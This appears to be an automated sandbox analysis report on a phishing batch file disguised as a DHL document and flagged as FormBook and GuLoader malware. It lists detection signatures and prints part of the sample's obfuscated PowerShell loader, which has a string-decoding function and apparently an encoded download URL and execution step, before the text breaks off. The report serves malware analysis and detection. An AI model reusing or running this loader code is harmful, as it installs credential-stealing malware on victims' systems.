Edit tour
Windows
Analysis Report
rDHL_PT563857935689275783656385FV-GDS3535353.bat
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 6552 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\rDHL_ PT56385793 5689275783 656385FV-G DS3535353. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6716 cmdline:
powershell .exe -wind owstyle hi dden "writ e 'Reactua lizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars14 7 Acuity T rvaren Tal efrihed Ak tivitetspd agogikker Ubehjlpsom mes Moutle r Croise17 8 Mandigt Blindtarms operation Laeder tit re Beskytt elsens Fre mmedsproge ne Lyrists 7 Afgr Cae saropapacy Overskrif tsstrrelse r Reactual izations r entvisten Exploder g awkihood u rtesupper Indstrmme Guitars147 Acuity Tr varen Tale frihed Akt ivitetspda gogikker U behjlpsomm es Moutler Croise178 Mandigt B lindtarmso peration L aeder titr e Beskytte lsens Frem medsprogen e Lyrists7 Afgr Caes aropapacy Overskrift sstrrelser ';If (${ho st}.Curren tCulture) {$Afikling shastighed ++;}$Papir indfringen 51='SUBsTR ';$Papirin dfringen51 +='ing';Fu nction Okt antals($Ma aleresulta tet){$Fuld skggets=$M aaleresult atet.Lengt h-$Afiklin gshastighe d;For( $Hy pergamousl y=4;$Hyper gamously - lt $Fuldsk ggets;$Hyp ergamously +=5){$Reac tualizatio ns+=$Maale resultatet .$Papirind fringen51. Invoke( $Hypergamo usly, $Afi klingshast ighed);}$R eactualiza tions;}fun ction Onco genes($Fli rtigig){ & ($eksile redes) ($F lirtigig); }$Klagefri st=Oktanta ls ' RatMS eptoKrimzB ilsi,adilI scelCreaaP ort/Ud.e5t r.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwS crusGalv E ddNe itTV ks Indu1Fi le0Guri.Sd ek0 san;Eg yp KatdWC. rniSensn C as6 em4.og i;Tylv For xF mm6Spor 4Teq ;Ka c DelfrInfo vMo e:Myop 1Brys2Kura 1 wag.Tils 0Sund).ipp redGCance TobcSjusk U,do Fly/ Unsc2Prot0 Homo1Raak0 T.ni0Blus1 afgu0.syk1 Um, U,pFG lycihoveru artedanif havoBassxO ver/Tilb1K omm2Scam1D in .hyld0I nit ';$Mor vin=Oktant als 'TeksU ValsBrace Wi rEuro- ArgeAMaalg SkvueDok,n TimtMod. ';$urtesup per=Oktant als 'Cocih undt fjet SerpH rks Talw:Ens./ Kurv/Semie UdkcKlbeo StrnVogts ColtGeomr Behoa Hj.m .lndeServd Cowhi.otea Enke.Bar c LeveoEmptm Brim/S.anS Kon,aGl,nm De,asNonze ForsnNo,rd BareCurv. DagjC evp Nebub,oth ';$Dvelrer es=Oktanta ls ' P o>w ood ';$eks ileredes=O ktantals ' Avi,iglyce Afk,xP,ra ';$Synecol ogic='Acui ty';$Flagk nap = Okta ntals 'Sek re prvc ,o dh IndoCho u Sk.t%Bli paBru pEks ppNo idD.k oaOp.rtRom aa Rim%Ree x\del,NSed .eInvedMov p PecrDis kiOutdoFis krEndoi N, nt,ttaeVes trSicae.eb onFa,ddL g teSu o2U,a s0K,es0Dog m.RetySund iiDra.g Di s isot&,ot a&Rutt Med beFlotcPro xhDowco.la s Indst cr ';Oncogen es (Oktant als 'Abol$ Divegkaf l Convo,lgpb .ejmaSalgl Oli:E.seM Cenb Nume Shirl Krap BespoAmnil Me,tiDagst Konsu F gr Gig.eModur M,lj=Af.u( DovecFremm Obted.hak Tvan/F.rfc Eole o v$. eldF Unmlt egmaMut.gP arckVetenE getaItc pC ons)Korr ' );Oncogene s (Oktanta ls ',epr$o rdsg evelC anioLevub ela,nrilAn dr: Balg o inaRekrwtu dskPartiUn